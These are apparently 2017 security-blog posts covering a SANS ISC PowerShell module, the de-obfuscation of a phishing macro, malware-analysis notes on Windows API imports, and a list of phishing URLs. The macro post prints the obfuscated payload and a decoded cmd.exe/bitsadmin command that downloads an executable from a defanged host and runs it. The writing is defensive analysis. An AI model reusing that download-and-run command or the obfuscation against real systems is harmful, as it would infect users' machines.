Thursday, June 22, 2017

Powershell Module to query the SANS ISC API

I listed to a great #SansAtNight talk at #SANSMinneapolis about the @sans_isc by @johullrich and thought I'd try to help out a little with a stormcenter PS module

The SANS ISC API Powershell module is at my github site

You can use it simply by doing commands like

Import-Module stormcenter
Get-ISCInfocon
Get-ISCHandler
Get-ISCIp 192.192.192.192
and many more

It is querying the SANS ISC API





More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0
  2. SANS ISC API Powershell Module


Copyright © 2017, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Wednesday, June 7, 2017

De-obfuscating Macro from Phish Email

Saw this word doc in an email

Virus Total link

MD5 8cd6cee9d328a0c0fa8d5ddb150cd5e9

Email Subject: XXXX Credit Card Authorization Form

It contained macros that were obfuscated, partial example is below

Sub AutoOpen()
eculso = "85.95.86.32.87.106.87.18.33.85.18.20.105.83.91.102.88.97.100.18.33.102.18.40.18.97.96.91.92.103.18.24.18.84.91.102.101.83.86.95.91.96.18.33.102.100.83.96.101.88.87.100.18.103.102.91.105.98.107.18.33.86.97.105.96.94.97.83.86.18.33.98.100.91.97.100.91.102.107.18.96.97.100.95.83.94.18.90.102.102.98.44.33.33.98.98.87.98.98.87.98.98.87.102.107.32.85.97.95.33.102.102.102.33.36.96.97.100.87.96.32.87.106.87.18.23.83.98.98.86.83.102.83.23.78.107.96.87.96.95.32.87.106.87.18.24.101.102.83.100.102.18.23.83.98.98.86.83.102.83.23.78.107.96.87.96.95.32.87.106.87.20"
eculso = ekkule(eculso, ".")
resultString2 = ynoqa(eculso)

....


The string eculso clearly contained the malicious command to be run, so I removed the "run" commands in vb and created a de-obfuscate function reversing their vba code.

Public Function deobfuscate(obfuscated_command)
  pass1 = Join(Split(obfuscated_command, "."), "%%")
  still_obfuscated_command = Split(Trim(pass1), "%")
  resultstr = ""
  For counter = 0 To UBound(still_obfuscated_command)
   If Len(still_obfuscated_command(counter)) > 0 Then
    rotate_pass2 = CInt((still_obfuscated_command(counter))) + 10
    rotate_pass3 = Chr((rotate_pass2 + 2) + 2)
    converted_string = Array(resultstr, rotate_pass3)
    resultstr = Join(converted_string, "")
   End If
  Next
  deobfuscate = resultstr
End Function

Private Sub Document_Open()
  obfuscated_command = "85.95.86.32.87.106.87.18.33.85.18.20.105.83.91.102.88.97.100.18.33.102.18.40.18.97.96.91.92.103.18.24.18.84.91.102.101.83.86.95.91.96.18.33.102.100.83.96.101.88.87.100.18.103.102.91.105.98.107.18.33.86.97.105.96.94.97.83.86.18.33.98.100.91.97.100.91.102.107.18.96.97.100.95.83.94.18.90.102.102.98.44.33.33.98.98.87.98.98.87.98.98.87.102.107.32.85.97.95.33.102.102.102.33.36.96.97.100.87.96.32.87.106.87.18.23.83.98.98.86.83.102.83.23.78.107.96.87.96.95.32.87.106.87.18.24.101.102.83.100.102.18.23.83.98.98.86.83.102.83.23.78.107.96.87.96.95.32.87.106.87.20"
  actual_command = deobfuscate(obfuscated_command)
  InputBox "malcode", "infosec", actual_command
End Sub


Which results in the malicious command printed to the a popup for me to view

cmd.exe /c "waitfor /t 6 oniju & bitsadmin /transfer utiwpy /download /priority normal hxxp://ppeppeppety[.]com/ttt/2noren.exe %appdata%\ynenm.exe &start %appdata%\ynenm.exe"







More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2017, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Random Strings XML notes

Random notes on running strings and finding xml

If you see something like ...
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
   <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
     <requestedPrivileges>
      <requestedExecutionLevel level='asInvoker' uiAccess='false' />
     </requestedPrivileges>
    </security>
   </trustInfo>
</assembly>
It could be a Visual Basic Manifest that specifies a requested execution level (default is asInvoker), and for example could specify a requested execution level of highestAvailable or requireAdministrator.





More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2017, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Random PEiD notes

Random PEiD notes.


Packers ASProtect 2.1x SKE -> Alexey Solodovnikov =



Others

Borland Delphi 6.0 - 7.0 =

Microsoft Visual C++ 6.0 =

Nothing found * =







More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2017, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Random Windows Executable Dependency Notes

Random windows executable dependency notes.
Windows API reference


ADVAPI32.dll = part of an advanced API services library supporting numerous APIs including many security and registry calls

    @ CreateServiceA = create a new windows service, can be used for persistence

    @ RegCreateKeyExA = create or open registry key, can be used for persistence

    @ GetSetValueExA = set registry value, can be used for persistence

    @ StartServiceA = start a windows service, can be used for persistence

AUTHZ.dll = responsible for component Authorization Framework for Windows systems

    @ AuthzInitializeContextFromSid = creates a user-mode client context from a user security identifier (SID)



COMCTL32.dll = module that contains common GUI components used by Windows applications

COMDLG32.dll = module that contains Common dialog boxes used by Windows applications, such as the standard Open File form

    @ GetOpenFileNameA = open file dialog box

    @ GetSaveFileNameA = save file dialog box



CRYPTBASE.dll = responsible for component Base cryptographic API DLL for Windows

GDI32.dll = library that implements the GDI subsystem, where primitive graphical operations are performed

IPHLPAPI.dll = module containing the functions used by the Windows IP Helper API

    @ GetAdaptersInfo = gets info on the network adapters of the system

    @ GetIfTable = enumerates physical interfaces on system



KERNEL32.dll = Windows operating system kernel

    @ CreateFileA = create an ASCII file, can be used to drop a file

    @ CreateMutexA = create a mutex (mutually exclusive object), can be used to avoid infecting the system more than once & to coordinate communications among multiple components

    @ CreateProcessA = create a process, can be used to execute a program

    @ CreateThread = create a process, can be used to generate child process

    @ ExpandEnvironmentStringsA = get an environment variable

    @ GetModuleFileNameA = gets the name of the a module/dll already loaded

    @ GetModuleHandleA = get an existing module/dll

    @ GetProcAddress = get address of an exported function

    @ GetSystemInfo = get info about the system

    @ LoadLibraryA = load a module/dll, can be used to inject into processes

    @ LoadLibraryW = load a module/dll, can be used to inject into processes

    @ VirtualAlloc = reserves memory in the calling process

    @ WriteExe = same as CreateProcess but for 16bit compatibility, can be used to execute a program

    @ WriteFile = write to a file, can be used to drop a file



KERNELBASE.dll = system file of Windows Operating System, which serves various Windows applications and services, kinda like a second generation of kernel32.dll

MFC42.DLL = module that contains the Microsoft Foundation Classes (MFC) functions

    @ WNetAddConnection2W = makes a connection to a network resource and can redirect a local device to the network resource

    @ WNetGetConnection2W = retrieves the name of the network resource associated with a local device

    @ WNetUseConnection2W = makes a connection to a network resource. The function can redirect a local device to a network resource



MPR.DLL = module containing functions used to handle communication between the Windows operating system and the installed network providers

MSVCP60.dll = standard C library functions such as printf, memcpy, and cos

MSVCRT.DLL = the C standard library for the Visual C++ (MSVC) compiler

    @ fopen = open a file

    @ memmove = overwrite memory



NDDEAPI.DLL = Windows for Workgroups DDE (Dynamic Data Exchange) Share Interface, no longer supported

    @ NDdeShareEnumA = retrieves available shares



NETAPI32.DLL = module that contains the Windows NET API used by applications to access a Microsoft network

    @ NetLocalGroupAddMembers = adds an account to a group, can be used for persistence

    @ NetUserAdd = adds a new account, can be used for persistence



NTDSAPI.DLL = module that contains a set of COM interfaces used to access the capabilities of directory services from different network providers

    @ DsServerRegisterSpnA = function either registers or unregisters the SPNs (service prinicpal names)



OLE32.dll = part of the object linking and embedding technology, or OLE

    @ CreateBindCtx = returns object with info about a particular COM linking moniker

OLEAUT32.dll = library used in Microsoft for OLE (Object linking and embedding) technologies; OLE Automation

PSAPI.dll = Process Status Helper file used by Windows to collate information and files about all your software & drivers on your PC

    @ EnumProcesses = Retrieves the process identifier for each process object in the system

    @ EnumProcessModules = Retrieves a handle for each module in the specified process



RPCRTREMOTE.dll = process which is responsible for component Remote RPC Extension for Windows

RSAENH.dll = module that implements the Microsoft enhanced cryptographic service provider (CSP)

    @ CPCreateHash = creates and initializes a new hash object

    @ CPDecrypt = Decrypt data



SHELL32.dll = Windows Shell API functions, which are used when opening web pages and files

    @ SHBrowseForFolderA = Displays a dialog box that enables the user to select a folder

    @ ShellExecuteA = performs an operation on a file like open, find, and explore



SHFOLDER.dll = contains functions regarding Windows special folders such as My Documents

    @ SHGetFolderPathA = can be used to return folder paths like user's AppData



SHLWAPI.dll = library which contains functions for UNC and URL paths, registry entries, and color settings

    @ SHDeleteKeyA = deletes a registry key and all descendants



URLMON.dll = module that contains functions used by Microsoft OLE (Object Linking and Embedding)

    @ UrlDownloadToFileA = Downloads bits from the Internet and saves them to a file, can be used to download payload



USER32.dll = used for windowing and other interactive user program tasks

    @ CreateWindowExA = open a new window

    @ DrawIcon = draw an icon or cursor

    @ EnableWindow = enable mouse and keyboard input in a window

    @ PeekMessageA = looks at incoming message to a window

    @ PostMessageA = sends message to a window

    @ RegisterClassExA = registers a class in relation to a window

    @ SetFocus = sets focus on a window

    @ SetWindowsHookEx = popular way keyloggers receive keyboard inputs



USERENV.dll = module that contains application programming interface (API) functions to create and manage user profiles

    @ LoadUserProfileW = Loads the specified user's profile. The profile can be a local user profile or a roaming user profile



USP10.dll = module that contains a collection of application programming interface (API) functions that enable a text layout client to format complex scripts



VERSION.dll = module that contains application programming interface (API) functions used for Windows version checking



WININET.dll = module that contains Internet-related functions used by Windows applications

    @ InternetOpenA = Initializes an application's use of the WinINet functions

    @ InternetOpenUrlA = Opens a resource specified by a complete FTP or HTTP URL

    @ InternetReadFile = Reads data from a handle opened by the InternetOpenUrl, FtpOpenFile, or HttpOpenRequest

    @ FindNextUrlCacheEntryA = Retrieves the next entry in the Internet cache

    @ DeleteUrlCacheEntry = Removes the file from the cache



WINNM.dll = module for the Windows Multimedia API, which contains low-level audio and joystick functions



WS2_32.dll = Windows Sockets API used by most Internet and network applications to handle network connections

    @ WSAloctl = controls the mode of a socket

    @ WSASocketA = creates a new socket



WSOCK32dll = just a wrapper for the actual winsock ws2_32.dll, windows sockets api

    @ gethostbyname = lookup ip of host

    @ send = send data thru socket

    @ socket = create a socket

    @ WSAStartup = initiates use of the Winsock DLL by a process







More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2017, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Tuesday, April 18, 2017

ShadowBrokers EquationGroup Compilation Timestamp Observation

I looked at the IOCs @GossiTheDog ‏posted, looked each up in virus total and dumped the compilation timestamp into a spreadsheet.

To step back a second, the Microsoft Windows compiler embeds the date and time that the given .exe or .dll was compiled. Compilation time is a very useful characteristic of Portable Executable. Malware authors could zero it or change it to a random value, but I'm not sure there is any indication of that here. If the compilation timestamps are real, then there's an interesting observation in this dataset.

Virus total shows you this value for example.



If you notice, the files in the dump range from 11/2009 to 8/2013.



And if you throw it into a pretty little graph you see a possible timeline of exploit creation.



Just an observation.



More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2017, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Wednesday, April 12, 2017

Collection of Google Docs Phishes seen by @neonprimetime

Below is a timelined Collection of DropBox Phishes seen by @neonprimetime

Seen Live on: 4/12/2017
Url: hxxp://drcherian.com/alert/GD/
Folder: alert/SD
Page: Default
Source: PhishTank.com
Meta Page Title: Google Docs
Meta Page Author: None
Post page(s): Default



Seen Live on: 4/12/2017
Url: hxxp://drcherian.com/kingssss/GD/
Folder: kingssss/SD
Page: Default
Source: PhishTank.com
Meta Page Title: Google Docs
Meta Page Author: None
Post page(s): Default





More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2017, this post cannot be reproduced or retransmitted in any form without reference to the original post.